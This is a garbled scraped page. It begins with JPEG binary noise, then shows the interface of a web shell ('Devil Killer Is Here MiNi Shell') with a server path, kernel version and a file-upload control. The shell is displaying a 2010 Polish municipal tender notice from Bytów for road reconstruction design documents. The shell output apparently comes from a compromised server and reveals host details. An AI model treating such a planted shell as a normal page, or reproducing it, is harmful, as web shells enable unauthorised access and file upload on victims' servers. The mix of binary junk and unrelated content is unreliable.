JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100412/81559-N-2010.html

<p class="kh_header"><b>Bytów: Wykonanie dokumentacji technicznej przebudowy ulic w Bytowie: Pogodnej, Zwycięstwa oraz Stary Dworzec</b><br>
<b>Numer ogłoszenia: 81559 - 2010; data zamieszczenia: 12.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Bytów , ul. 1-go Maja 15, 77-100 Bytów, woj. pomorskie, tel. 059 822 20 11, faks 059 822 25 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bytow.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji technicznej przebudowy ulic w Bytowie: Pogodnej, Zwycięstwa oraz Stary Dworzec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia, jest wykonanie projektu budowlano wykonawczego wraz                       z kosztorysem inwestorskim, przedmiarem robót, studium wykonalności i szczegółową specyfikacją techniczną. Dokumentację należy przygotować na n/w branże:

a)	ul. Pogodna  - brak planu (zał. Nr 1):
-	Branża drogowa - przebudowa drogi wraz z chodnikiem - odcinek o dł. ok. 300 m 
od skrzyżowania z ul. Gdańską do skrzyżowania z ul. B. Wery w Bytowie.
-	Branża sanitarna - przebudowa kanalizacji deszczowej, kanalizacja sanitarna i wodociągowa  zgodnie z opinią Wodociągów Miejskich w Bytowie nr 225/10 z dnia 23.02.2010 roku.
-	Branża elektryczna - przebudowa oświetlenia w ciągu drogi;
-	Tereny zielone - w przypadku wystąpienia terenów zielonych należy sporządzić projekt 
ich zagospodarowania 
-	Projekt zagospodarowania terenu należy opracować na cały obszar w obrębie granic.

b)	ul. Zwycięstwa - obowiązuje miejscowy plan zagospodarowania przestrzennego Osiedla Gdańska (zał. Nr 2):
-	Branża drogowa  - przebudowa drogi wraz z chodnikami i parkingami - odcinek o dł. ok. 380 m oraz ciągu pieszo rowerowego łączącego projektowaną  ul. Zwycięstwa z ul. Gdańską w Bytowie o długości ok. 80 m. 
-	Branża sanitarna - przebudowa kanalizacji deszczowej, kanalizacja sanitarna i wodociągowa  zgodnie z opinią Wodociągów Miejskich w Bytowie nr 225/10 z dnia 23.02.2010 roku.
-	Branża elektryczna - budowa oświetlenia drogowego w ciągu drogi;
-	Tereny zielone - należy sporządzić projekt zagospodarowania;
-	Projekt zagospodarowania terenu należy opracować w obrębie całej strefy zgodnie z miejscowym planem zagospodarowania przestrzennego.

c)	ul. Stary Dworzec -  brak planu (zał. Nr 3):
-	Branża drogowa  - budowa drogi wraz z chodnikami i parkingami o długości ok. 680 m ;    
-	Branża sanitarna - przebudowa kanalizacji deszczowej, kanalizacja sanitarna                               i wodociągowa  zgodnie z opinią Wodociągów Miejskich w Bytowie nr 225/10 z dnia 23.02.2010 roku.
-	Branża elektryczna - budowa oświetlenia drogowego w ciągu drogi;
-	Tereny zielone - należy sporządzić projekt zagospodarowania;
-	Projekt zagospodarowania terenu należy opracować w obrębie całej strefy zgodnie                  z miejscowym planem zagospodarowania przestrzennego.


UWAGA: Dla każdego zadania należy wykonać oddzielne opracowanie  - łącznie 
3 dokumentacje.

W ramach niniejszego zamówienia należy uzyskać:
      1.   W przypadku braku planu zagospodarowania, decyzję o ustaleniu lokalizacji celu publicznego.
W ramach niniejszego zamówienia należy wykonać:
1.	Mapy do celów projektowych. 
2.	Studium wykonalności inwestycji (SW)
3.	Projekt budowlany wraz z uzyskaniem decyzji o pozwoleniu na budowę:
   4.    Projekt budowlany wielobranżowy:
-	Projekt zagospodarowania terenu.
-	Projekt architektoniczno - budowlany
-	Projekt branży drogowej
-	Projekt wodno kanalizacyjny
-	Projekt branży elektrycznej 
-	Projekt innej branży wynikający z uzgodnień z gestorami istniejącego uzbrojenia
-	Projekt organizacji ruchu na czas budowy.
-	Projekt organizacji ruchu - oznakowanie pionowe oraz poziome po zakończeniu budowy
-	Projekt elementów ochrony środowiska.
-	Operaty wodno-prawne wraz z decyzjami o pozwoleniu wodno-prawnym - w przypadku konieczności.
5. Projekt wykonawczy;
       6. Specyfikacje techniczne, przedmiary
7. Kosztorys inwestorski i Zbiorcze Zestawienie Kosztów
       8. Wersje elektroniczne całości zamówienia.
9. Nadzór autorski
Opracowanie należy wykonać w ilości:
1. wersja papierowa w ilości 5 egzemplarzy,
2. wersje elektroniczna projektu edytowalna w 2 egzemplarzach,
3. wersje elektroniczna projektu nieedytowalna na nośniku CD / DVD do udostępniania dokumentacji przetargowej na stronie internetowej. 1 kpl.


Warunkiem zakończenia przedmiotu zamówienia jest uzyskanie pozwolenia na budowę na wszystkie branże, bądź zgłoszenie robót budowlanych nie wymagających pozwolenia na budowę, które Wykonawca uzyska w imieniu Zamawiającego i z jego upoważnienia - koszty upoważnienia ponosi Wykonawca.

W zakres prac wchodzi również:

-	 uzyskanie wszelkich uzgodnień i pozwoleń dotyczących projektu:
a)	uzgodnienia z właścicielami wjazdów na posesje - wymagany  podpis właściciela na koncepcji projektu przy projektowanej rzędnej zjazdu; 
b)	uzgodnienie z zarządcami dróg: Zarząd Dróg Powiatowych w Bytowie, Zarząd Dróg Wojewódzkich w Gdańsku i Urząd Miejski w Bytowie,  
c)	oraz wszelkie uzgodnienia z odpowiednimi jednostkami branżowymi;
-	w przypadku kolizji projektowanej inwestycji z istniejącą infrastrukturą techniczną należy opracować projekt przebudowy tej infrastruktury;
-	sporządzenie raportu oddziaływania przedsięwzięć na środowisko (w razie konieczności); 
-	pełnienie nadzoru autorskiego nad realizacją w/w inwestycji. Do wyceny należy przyjąć 
10 pobytów projektanta na budowie;
-	wykonanie pomiarów ruchu oraz natężeń ruchu drogowego

Przy projektowaniu należy uwzględnić m.in.:
-	aktualne plany zagospodarowania przestrzennego,
-	decyzję ustalającą lokalizację inwestycji celu publicznego,
-	warunki do projektowania określone przez zarządców dróg,
-	warunki do projektowania określone przez właścicieli i zarządców infrastruktury, uzbrojenia,
-	art. 29, 30 ustawy Prawo Zamówień Publicznych. 

1. Mapa do celów projektowych
Wykonawca zobowiązany jest zapoznać się z wymaganiami Zamawiającego i projektantów poszczególnych branż.
Omawiane w niniejszej specyfikacji technicznej prace powinny być poprzedzone:
-	uzyskaniem z ośrodka dokumentacji danych dotyczących: osnowy poziomej i wysokościowej, mapy zasadniczej, map ewidencyjnych, inwentaryzacji sieci uzbrojenia terenu, opracowań jednostkowych,
-	pobraniem z katastru nieruchomości danych liczbowych i opisowych dotyczących gruntów 
i budynków oraz lokali, a także danych dotyczących właścicieli nieruchomości,
-	dokonaniem wywiadu branżowego dotyczącego sieci podziemnego uzbrojenia terenu (energetycznej, telefonicznej, gazowej, wodnej, kanalizacyjnej, c.o., i innej).
Szczególną uwagę należy zwrócić na:
-	istniejące klasy i dokładności osnów geodezyjnych,
-	rodzaje układów współrzędnych i poziomów odniesienia,
-	jakość i stan aktualności mapy zasadniczej,
-	wiarygodność danych dotyczących inwentaryzacji sieci uzbrojenia terenu (należy sprawdzić, 
czy pomiary wykonano bezpośrednio przed zakryciem, czy przy pomocy wykrywaczy elektronicznych lub tylko w oparciu o informacje branżowe),
-	aktualność danych z katastru nieruchomości (czy wprowadzane były na bieżąco w ośrodku dokumentacji, w jakim zakresie i w jaki sposób musza być zaktualizowane przez Wykonawcę 
w związku z wykonywanymi pracami.
Prace pomiarowe, w ich pierwszej fazie, powinny być poprzedzone wywiadem terenowym mającym na celu:
-	ogólne rozeznanie w terenie,
-	porównanie istniejącej mapy zasadniczej z terenem.
Z przeprowadzonego wywiadu będzie wynikać, które elementy zinwentaryzowane w terenie i w jakim zakresie i w jaki sposób musza być zaktualizowane przez Wykonawcę w związku z wykonywanymi pracami.
Pomiarem należy objąć szczegóły stanowiące treść mapy zasadniczej (ze szczególnym uwzględnieniem elementów sieci uzbrojenia terenu) oraz dodatkowo szczegóły konieczne 
do sporządzenia mapy dla celów projektowania dróg t.j.:
-	granice według istniejącego stanu prawnego lub stanu uwidocznionego w katastrze nieruchomości,
-	kilometraż dróg, w tym punkty referencyjne drogi,
-	wszystkie drzewa w pasie drogowym,
-	wszystkie ogrodzenia (furtki, bramy) z podziałem na trwałe i nietrwałe,
-	rowy (w pełnym zakresie),
-	studnie
-	zjazdy 
-	rzędne wlotu i wylotu, światła i skrajnie obiektów inżynierskich,
-	inne elementy niezbędne do projektowania, w tym: bariery drogowe, oświetlenie, odwodnienie, itp.
Sporządzenie mapy
1.	W pierwszej kolejności należy zaktualizować istniejąca mapę zasadniczą (lub wykonać nowa 
w przypadku jej braku) zgodnie z przepisami instrukcji K-1 i ustaleniami ośrodka dokumentacji.
2.	Opracowując mapę terenu metoda numeryczną, wyniki pomiarów sytuacyjno-wysokościowych należy przetworzyć przy pomocy oprogramowania komputerowego z podziałem co najmniej 
na następujące warstwy tematyczne: sytuacja, ewidencja gruntów (granice, numery działek, nomenklatura prawna gruntu, granice i nazwy jednostek podziału administracyjnego, granice, rodzaje użytków i oznaczenie klas gruntów), uzbrojenie terenu istniejące i projektowane uzgodnione dotychczas przez ZUDP, rzeźbą terenu, osnowa geodezyjna pozioma i wysokościowa wraz z reperami roboczymi. Mapę należy zapisać na komputerowych nośnikach informacji 
oraz arkuszowym mapy zasadniczej.

2. Studium wykonalności inwestycji (SW) należy wykonać zgodnie z wytycznymi dotyczącymi przygotowania Studiów Wykonalności w zakresie infrastruktury drogowej (załącznik http://www.zporr.gov.pl/NR/rdonlyres/9F2D6268-B1EE-4AB5-87E8-C685DC952DF3/0/zporr_sw_infr_drog2.pdf). Należy uwzględnić ewentualną możliwość aktualizacji studium w miarę pojawienia się nowych wytycznych z Ministerstwa Rozwoju Regionalnego.

3.	Projekt budowlany wraz z uzyskaniem decyzji o pozwolenie na budowę

Projekt budowlany (PB) objęty niniejszym zamówieniem służyć ma:
- ostatecznemu uściśleniu wszystkich elementów planowanego zadania inwestycyjnego,
- uzyskaniu decyzji o pozwoleniu na budowę, bądź zgłoszeniu robót budowlanych nie wymagającej pozwolenia na budowę,
Szczegółowy zakres i formę PB określa ustawa Prawo budowlane z dnia 7 lipca 1994 r. ze zm. oraz
rozporządzenia:
-	Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego,
-	Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego.
1. Szczegółowość opracowań projektowych
Wszystkie elementy zagospodarowania terenu i wszystkie obiekty oraz urządzenia należy zaprojektować szczegółowo, tj. przy założeniu, że nie będą już zmieniane, a wiec w wersji ostatecznej. Oznacza to, że zaprojektowane elementy lub ich parametry nie będą się zmieniać 
w następnych stadiach dokumentacji projektowej. Zakłada się, że zostaną one zaprojektowane 
na podstawie dokładnych danych wyjściowych i dokładnych metod obliczeń lub analiz.

 5. Projekt wykonawczy
Podstawą do opracowania Projektu Wykonawczego jest Projekt Budowlany.
Projekt wykonawczy powinien zawierać rozszerzenia o zagadnienia istotne z punktu widzenia o:
- możliwości jednoznacznej oceny i wyceny przedmiotu zamówienia,
- potrzeb procesu wykonawczego robót budowlanych.
Powinien zawierać wszystkie szczegółowe rozwiązania w zależności od potrzeb, zagadnienia związane z projektowanymi obiektami przewidzianymi do czasowego użytkowania w trakcie realizacji robót.
Projekt wykonawczy powinien również zawierać istotne z punktu widzenia wykonawstwa robót, materiały mające związek z uzyskaniem opinii lub zawierające warunki wykonawcze.
Projekt winien posiadać wykaz opracowań oraz pisemne oświadczenie Jednostki Projektowej, 
że wykonany jest zgodnie z Umową, obowiązującymi normami i został wykonany w stanie kompletnym z punktu widzenia celu któremu ma służyć.
W skład projektu wykonawczego powinny wejść wszystkie planowane obiekty, instalacje 
i urządzenia, które powinny być zasygnalizowane na rysunkach ogólnych.
W części opisowej Projektu Wykonawczego ująć należy wyciąg z Projektu Budowlanego ujmujący
opinie, uzgodnienia, warunki realizacji i pozwolenia wymagane odrębnymi przepisami, zawierający
uzupełnienia istotne dla potrzeb wykonawstwa robót.
Dla każdego obiektu inżynierskiego, Projekt Wykonawczy powinien stanowić odrębną całość (ze
wszystkimi uszczegółowieniami elementów).
Projekt osnowy geodezyjnej i schemat tyczenia dla każdego obiektu wykonać zgodnie z przepisami branżowymi.

 6. Specyfikacje techniczne, przedmiary, kosztorysy ofertowe
1. Specyfikacje techniczne oraz specyfikacje wymagań ogólnych.
2. Przedmiar

 7.  Kosztorys inwestorski i Zbiorcze Zestawienie Kosztów
Wykonany dla każdego zadania oddzielnie. Sporządzony zgodnie z Rozporządzeniem Ministra Infrastruktury z dn. 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 poz.1389).
Kosztorys inwestorski i Zbiorcze Zestawienie Kosztów należy wykonać dla wszystkich występujących branż, zgodnie z obowiązującymi przepisami:
- wersje papierowa w dwóch egzemplarzach,
- oraz wersje elektroniczna edytowalna w jednym egzemplarzu na odrębnym CD / DVD.

 8.  Wersja elektroniczna całości zamówienia
W ramach niniejszego opracowania należy wykonać:
- Wersję elektroniczną edytowalną całości zamówienia na nośniku CD / DVD w dwu egzemplarzach,
- Wersję elektroniczną całości zamówienia nieedytowalną na nośniku CD / DVD do udostępniania dokumentacji przetargowej na stronie internetowej w 1 egzemplarzu, do zamieszczenia na stronie internetowej przy ogłaszaniu przetargu na roboty budowlane,
- wersje elektroniczna kosztorysu inwestorskiego edytowalna w 1 egz. na odrębnym CD /DVD 
w jednym egzemplarzu.

 9. Nadzór autorski
Wykonawca zapewni nadzór autorski w czasie robót realizowanych na podstawie dokumentacji projektowej sporządzonej w oparciu o Umowę w zakresie określonym przez ustawę Prawo budowlane, a także zobowiązany jest, na wezwanie przedstawiciela Zamawiającego, do:
-	niezwłocznego przyjazdu na teren budowy, nie później jednak niż 3 dni od otrzymania wezwania,
-	opiniowanie zgodności projektów wykonawczych, technologicznych i zamiennych wykonywanych przez wykonawcę robót w zakresie zgodności z wymaganiami dokumentacji projektowej,
-	niezwłocznego wykonywania poprawek i uzupełnień w dokumentacji projektowej.
Wymagania dotyczące formy składania zamówionej dokumentacji
Przed przekazaniem opracowań projektowych do odbioru częściowego lub ostatecznego Wykonawca przedstawi Zamawiającemu do akceptacji proponowany spis teczek i ogólna szatę graficzną opracowań projektowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust.1 pkt 6,  stanowiące nie więcej niż 20% wartości zamówienia podstawowego i polegające na powtórzeniu  tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.23.22.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca ubiegający się o udzielenie zamówienia publicznego jest zobowiązany wnieść, przed upływem terminu składania ofert, na czas związania ofertą, wadium         w wysokości 2 000,00 zł. 
2.	W zależności od wyboru Wykonawcy, wadium może być wniesione:
a)	w pieniądzu, przelewem na konto Zamawiającego: Bank Pekao S.A.I/O Bytów           nr 64 12403783 1111 0000 4080 8675  z dopiskiem Wadium - Projekt dróg
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
3.	 W przypadku gdy Wykonawca wnosi wadium w formie gwarancji bankowej lub ubezpieczeniowej  z treści tych gwarancji musi jednoznacznie wynikać:
a)	zobowiązanie gwaranta ( banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i  bezwarunkowo na pierwsze żądanie Zamawiającego (Beneficjenta) przedłożone w okresie obowiązywania gwarancji, zawierające oświadczenie, że wystąpiła jedna z okoliczności określonych w art. 46 ust. 4a i 5 ustawy ,
b)	termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą.
4. Wadium wniesione w innej formie niż pieniężna należy dołączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykazać, że wykonał w sposób należyty co najmniej 2 projekty dróg. Każda droga o długości min. 200m .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują co najmniej po jednej osobie   z uprawnieniami  do projektowania w specjalności :  
- instalacyjnej w zakresie sieci, instalacji i urządzeń wod. - kan., cieplnych, wentylacyjnych i gazowych, - bez  ograniczeń,
- drogowej - bez  ograniczeń,
- architektonicznej -bez ograniczeń,
- instalacyjnej w zakresie sieci,  instalacji i urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.bytow.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
77-100 Bytów, ul. 1-go Maja 15, pok. nr 40.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2010 godzina 09:45, miejsce: sekretariat Urzędu Miejskiego
77-100 Bytów, ul. 1-go Maja 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





